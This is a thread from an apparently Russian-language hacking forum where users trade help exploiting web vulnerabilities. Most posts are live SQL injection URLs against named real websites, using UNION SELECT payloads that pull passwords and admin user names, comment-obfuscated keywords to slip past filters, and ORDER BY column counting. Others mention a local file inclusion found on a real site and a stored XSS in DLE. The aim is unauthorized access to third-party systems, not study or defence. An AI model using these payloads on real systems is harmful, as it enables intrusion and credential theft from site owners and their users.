Ваши вопросы по уязвимостям.

Может кто нибудь на примере объяснить?

У формы action="?page=reg"
2 поля
допустим
login
pass

В логин я пишу 123
В пасс - 1 UNION ..........

Вывод есть у 4,5 и 6-го поля.

Как правильно вбить параметры в программу?

и где proxy вписывать, а то не нашел?
+ допустим точно знаю, что есть таблицы users и news

 

website is vulnerable

sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1

i use command order by and i got 23 columns but when i paste link in browser like this

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

page load normally and i can not see printable field

can help me what i am doing mistake

 

*.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
try to put(deliver) -
*.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

 

linuxkernel это русскоязычный форум и здесь очень мало народа понимает что вы писали, следующий раз используйте онлайн транслиты или ваш пост будет удален.
-------
linuxkernel this is a russian board forum,and most of guys can't understand what u posted here,next time use online translators or your post will be deleted

 

Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...

 

вы издеваетесь что ли? я же написал выше, не писать на английском!!!!

linuxkernel и все кто хочет задавать такие вопросы ` hackforums.net, вам туда

для этих целей используют SIPT

 

Прошу помощи:
Нашел вроде скуль:
_http://dovidka.if.ua/rubric.php?id=86'
Но не могу подобрать колонки? в чем проблема?

 

http://dovidka.if.ua/rubric.php?id=-86+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7

 

Code:

http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass

помогите подобрать логин плз

 

Code:

http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1

Ошибка 403.

А вот так:

Code:

http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+

Работает.

Как обойти?

 

http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+admin

 

Code:

http://www.crossfitnb.com/archive.php?month=-2009-03%27+Union+select+1,2,3,4,version(),6,7,8,9,10+--+

 

всем привет!

-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?strona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

не могу найти принтабельное поле...

 

там нет ничего

 

можно вопрос? как вы узнали сколько там полей? спасибо.

 

да как всегда, через order by по выводу ошибки

-->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/mobilex.pl/banery.php

 

id=-153 order by 8++&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

Здесь есть второй под запрос.

http://www.mobilex.pl/istats5/login.php
http://www.filipov.pl/istats5/index.php?p=admin - раскопаешь этот двиг = Profit!

я уже LFI в нём нашёл http://www.mobilex.pl//istats5/winday.php?r=ololo
Остальное за тобой.

 

чтобы всё так просто было не постил бы

 

вот и хотелось бы узнать, что я не так делаю, а не слушать тут пустые наезды и понты

 

Есть псивная xss в DLE.

При открытии ее в строке,страница сворачивается и все. Как можно хотя бы, вывести алерт? Должен вылететь алерт с надписью xss... Но ничего не происходит.